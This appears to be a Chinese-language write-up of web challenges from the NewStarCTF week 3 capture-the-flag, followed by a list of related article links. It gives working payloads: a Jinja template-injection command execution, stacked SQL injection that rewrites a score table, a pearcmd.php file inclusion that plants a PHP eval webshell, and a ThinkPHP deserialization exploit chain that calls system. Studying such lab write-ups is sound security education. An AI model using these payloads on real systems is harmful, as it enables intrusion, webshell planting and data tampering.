BabySSTI_One

只有一点点过滤
直接附上payload:
name={{lipsum.__globals__['__builtins__']['eval']("__import__('os').popen('tac /*').read()")}}

multiSQL

题目名字可以看出来,多SQL,堆叠注入
过滤了select 可以用show
列出库、表、字段、
发现没找到flag
而刚进入的页面是有一个可点击的页面进去看下verify.php
里面完全的没有验证,而且应该是一个简单的判断,判断成绩是否达到了425分,那么应该是使用update更新数据库信息,让火华师傅的成绩大于425即可
这里提供两种方法,一种是用replace into替换掉update,也可以使用预编译的方式
方法一:


username=1';replace into score values("火华",999,999,999);#111';delete from score where listen=11;%23 username=1';HANDLER score OPEN;HANDLER score READ FIRST;HANDLER score CLOSE;%23

但是点击没用查询火华的成绩时候,出现两个火华,应该是多了直接删除即可

方法二:

//update score set listen = 100 where username = '火华';
username=1';set @a = 0x7570646174652073636f726520736574206c697374656e203d2031303020776865726520757365726e616d65203d2027e781abe58d8e273b;prepare smtm_test from @a;execute smtm_test;#

IncludeTwo

这里利用到了pearcmd.php的知识
离别歌师傅的博客中讲到了这个知识点:Docker PHP裸文件包含
直接用payload:

?+config-create+/&file=/usr/local/lib/php/pearcmd&/<?=eval($_POST[1]);?>+/var/www/html/Yan9.php

接着直接访问文件就能RCE(用bp发包,否则这里的符号会被编码)

Maybe You Have To think More

进入题目,一个搜索框提示不是SQL注入
任意输入地址发现:

一看就是thinkphp 版本漏洞了
搜索漏洞发现有getshell跟反序列化
这里有一个输入框
确定是反序列化漏洞
直接拉网上的exp打

<?php
namespace think;
abstract class Model{protected $append = [];
private $data = [];
function __construct(){$this->append = ["Yan9"=>["hello","world"]];
$this->data = array('Yan9'=>new Request());
}
}
class Request
{protected $hook = [];
protected $filter;
protected $config = [
// 表单请求类型伪装变量
'var_method'       => '_method',
// 表单ajax伪装变量
'var_ajax'         => '_ajax',
// 表单pjax伪装变量
'var_pjax'         => '_pjax',
// PATHINFO变量名 用于兼容模式
'var_pathinfo'     => 's',
// 兼容PATH_INFO获取
'pathinfo_fetch'   => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
// 默认全局过滤方法 用逗号分隔多个
'default_filter'   => '',
// 域名根,如thinkphp.cn
'url_domain_root'  => '',
// HTTPS代理标识
'https_agent_name' => '',
// IP代理获取标识
'http_agent_ip'    => 'HTTP_X_REAL_IP',
// URL伪静态后缀
'url_html_suffix'  => 'html',
];
function __construct(){$this->filter = "system";
$this->config = ["var_ajax"=>''];
$this->hook = ["visible"=>[$this,"isAjax"]];
}
}
namespace think\process\pipes;
use think\model\concern\Conversion;
use think\model\Pivot;
class Windows
{private $files = [];
public function __construct()
{$this->files=[new Pivot()];
}
}
namespace think\model;
use think\Model;
class Pivot extends Model
{}
use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
?>

附上源码下载地址
命令执行之后发现flag在环境变量里面

NewStarCTF 公开赛赛道week3 web writeup相关推荐

  1. 2022 七校联合NewStarCTF 公开赛赛道 WEEK3|MISC

    1.Whats HTTP 2.qsdz's girlfriend 3 3.WebShell! hint提示蚁剑,根据流量包大小排序,逐个打开看 4.Yesec no drumsticks 3 压缩包第 ...

  2. BUUCTF NewStarCTF 公开赛赛道Week3 Writeup

    文章目录 WEEK3 MISC Whats HTTP WebShell! qsdz's girlfriend 3 Yesec no drumsticks 3 混沌的图像 WEB BabySSTI_On ...

  3. 七校联合NewStarCTF 公开赛赛道WEEK2 web wp

    也不知道是不是公开赛和内部赛是不是同一套题,week1的题挺简单的 这里小记一下week2的题目 如有侵权立刻删除 Word-For-You(2 Gen) 这题很简单就带过一下吧,报错注入就行 1'| ...

  4. BUUCTF NewStarCTF 公开赛赛道Week5 Writeup

    文章目录 WEB Give me your photo PLZ BabySSTI_Three Unsafe Apache So Baby RCE Again Final round MISC 最后的流 ...

  5. BUUCTF NewStarCTF 公开赛赛道Week4 Writeup

    文章目录 WEB So Baby RCE BabySSTI_Two UnserializeThree 又一个SQL PENTEST N&O&R MISC 奇怪的PDF Yesec no ...

  6. NewStarCTF 公开赛赛道 第一周Web题目

    目录 我真的会谢 NotPHP Word-For-You 我真的会谢 进入页面 flag被藏在了三个部分,从意思上来分析应该是信息泄露题.可以看这个链接:CTF信息泄露总结 - 码农教程 查看源码 猜 ...

  7. NewStarCTF 公开赛赛道 第二周学习记录

    额..又是我哦,这次难度对于我来说有点高,一共就做出来这几个,属实有点少,作为菜鸡的我来给大家讲讲我的思路.... CRYPTO 一个还没做出来,还正在研究 MISC Yesec no drumsti ...

  8. NewStarCTF 公开赛赛道

    HTTP 跟着提示一步一步走. Head?Header! 同样是跟着提示. NotPHP <?php error_reporting(0); highlight_file(__FILE__); ...

  9. NewStarCTF 公开赛赛道 WEEK2 pwn 砍一刀

    64位的,保护机制 ida打开,简单的分析下程序流程,让你输入2次回车,一次666,再一次回车进入getcard函数,期间有 时间间隔 此函数就是输入19次回车后v1==999,进入if后会有随机数, ...

最新文章

  1. Android中使用Room时怎样存储带list集合的对象
  2. 深入浅出CUDA编程
  3. Spring添加对缓存的支持
  4. 台式电脑计算机硬盘清理,台式电脑重装系统win7清理磁盘碎片的方法
  5. HDU - 2586 How far away ?(LCA)
  6. Python编写自动化脚本(无验证码)
  7. 关于.NET5在IIS中部署的几个问题总结
  8. boost asio io_service与 strand 分析
  9. python开发环境有哪些_python编程需要什么环境
  10. python里turtle.circle什么意思_Python turtle.circle方法代碼示例
  11. Windows 10 May 2020 中 WSL 与 WSL2 的性能比较
  12. SQL Server provider: SQL 网络接口, error: 26 - 定位指定的服务器/实例时出错
  13. selenium (二)
  14. struts的输入验证服务器端与客户端
  15. numpy - np.where
  16. 截图软件 snipaste
  17. java 泛洪攻击_网易有道后端实习面经
  18. python-can库基于PCAN-USB使用方法
  19. yapi 权限_yapi部署
  20. gcf,gca自己理解

热门文章

  1. GDB/MI 命令总结
  2. Qt游戏开发-深海危机
  3. GHOST-简易使用手册,快速读懂GHOST里的意思,快来GET它吧
  4. 人工智能中的图灵测试
  5. springboot启动源码分析3-环境配置
  6. 使命召唤10:幽灵中文版分享
  7. Win10 .chm文件无法打开解决方案
  8. 【免费SEO工具分享】长尾关键字挖掘器:外贸拓词长尾关键词挖掘工具
  9. 函数、原生JS的事件相关(上)
  10. 亚马逊为什么能够成为创新力最强的公司